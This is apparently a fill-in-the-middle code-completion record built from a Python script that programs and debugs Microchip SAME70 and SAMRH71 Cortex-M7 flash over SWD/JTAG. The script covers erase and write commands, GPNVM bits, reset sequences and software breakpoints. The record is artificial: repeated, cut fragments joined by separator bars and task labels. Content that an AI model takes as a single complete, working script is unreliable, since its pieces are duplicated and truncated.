(page_number/256, page_number*2, adr))
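# --- Illustrative sketch, not part of the original script ---
# The page_number arithmetic above packs the page index into the FARG bitfield
# (bits 8..23) of EFC_FCR. Worked example for a Canopus part (PAGE_SIZE 512,
# flash at 0x00400000): adr = 0x00401200 -> adr & 0x3ffe00 = 0x1200 (byte offset
# of page 9), and 0x1200 / 2 = 0x900 == 9 << 8, i.e. page 9 already shifted into
# FARG. For SAMRH71 (PAGE_SIZE 256) the mask 0x3fff00 leaves page << 8 directly.
def farg_for_address(adr, rh71):
    # Return the page number already positioned in the FARG field; ">> 1" is
    # equivalent to the "/2" used above for these non-negative addresses.
    if rh71:
        return adr & 0x3fff00 # 256-byte pages: masked offset bits equal page << 8
    return (adr & 0x3ffe00) >> 1 # 512-byte pages: halve once to get page << 8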
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Convert the value to indexed access, writing one GPNVM bit at a time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 doesn't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakpoint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address of the flash page(s) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16 pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
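# --- Illustrative sketch, not part of the original script ---
# How set_sw_bp() locates the breakpoint inside its read-modify-write buffer,
# shown standalone for a hypothetical Canopus-style layout (FLASH_START 0x400000,
# PAGE_SIZE 512, 16-page buffer beyond the first 16kb of flash):
def locate_bp(address, flash_start=0x400000, page_size=512):
    addr = address & (flash_start - 1) # accept 0x0- or FLASH_START-based addresses
    buffer_size = page_size if addr < 16384 else page_size * 16
    buffer_mask = buffer_size - 1
    start_addr = addr & ~buffer_mask # first byte of the page group to rewrite
    bp_addr = addr & buffer_mask # breakpoint offset inside the buffer
    return start_addr, bp_addr, buffer_size
# e.g. locate_bp(0x00412346) -> (0x12000, 0x346, 8192)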
def reset_target():#mplab
|
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab
dev.Disconnect()
| reset_and_halt() | identifier_body |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
was_running = True
halt_or_raise()
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 uses SYSRESETREQ to reset core + peripherals; this loses the connection, so we need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus uses RSTC (PROCRST) to reset peripherals and VECTRESET to reset the core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# Flash reset problem (rev 2.0 of the device): without this workaround the
# flash can only be read on every second reset.
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if the flash is not erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if the flash is not erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Convert the value to indexed access, writing one GPNVM bit at a time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 doesn't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
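# --- Illustrative sketch, not part of the original script ---
# The "Cfg" branch above walks the incoming bytes LSB first and only acts on
# bits selected by GPNVM_BIT_MASK. A standalone dry run of that walk with the
# Canopus mask 0x183 and hypothetical payload bytes [0x02, 0x01]:
def gpnvm_actions(data, gpnvm_mask):
    actions = []
    mask = gpnvm_mask
    bit_index = 0
    for val in data:
        for i in range(8):
            bit = (val >> i) & 1
            if mask & 0x01:
                actions.append((bit_index, "set" if bit else "clear"))
            mask = mask >> 1
            if not mask:
                return actions
            bit_index += 1
    return actions
# gpnvm_actions([0x02, 0x01], 0x183) -> [(0, 'clear'), (1, 'set'), (7, 'clear'), (8, 'set')]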
def | (type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakpoint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address of the flash page(s) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16 pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab
dev.Disconnect()
| prog_read | identifier_name |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
|
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
